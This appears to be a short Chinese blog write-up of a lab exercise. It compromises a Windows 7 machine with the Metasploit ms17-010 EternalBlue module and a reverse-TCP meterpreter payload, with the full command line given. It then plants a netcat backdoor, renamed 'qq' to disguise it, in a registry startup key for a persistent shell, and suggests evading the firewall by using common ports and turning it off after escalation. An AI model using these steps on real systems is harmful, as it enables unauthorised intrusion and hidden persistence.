nc后门
實驗環境
靶 機:windows 7
攻擊機:kali
漏洞利用:ms17-010
msfconsole use exploit/windows/smb/ms17_010_eternalbule set payload windows/x64/meterpreter/reverse_tcp set rhosts 192.168.21.134 set lhost 192.168.21.130 set lport 6666 run拿到權限后上傳我們的nc后門程序(我把它改名成了qq)
查看啟動項的鍵值項,查看有哪些啟動項
在注冊表啟動項內添加我們的后門,-v 指定服務名稱,-d指定程序路徑,-Ldp指定反彈shell的端口,-e指定反彈的程序
查看我們感剛剛添加的啟動項
重啟靶機
kali,nc連接
直接拿到shell
這里我的防火墻是關閉的現在我們把防火墻開啟試一下(在防火墻關閉的情況下先與靶機建立連接,如何在防火墻開啟的情況下建立連接這個涉及本人知識盲區了)
連接的時候是這樣一個情況
接下來我們需要
這樣就可以在防火墻開著的情況下進行連接了
個人觀點一般都是通過web上傳拿到shell,然后用msf生成powershell上傳,然后在設置端口的時候設置成常用的端口這樣就不會被防火墻攔截了,在提權后關閉掉防火墻。
如果有大佬看見,希望可以對我指點下!!!
總結
- 上一篇: SpringBoot+redis实现用户
- 下一篇: WSL2跟踪 - 18945: 通过lo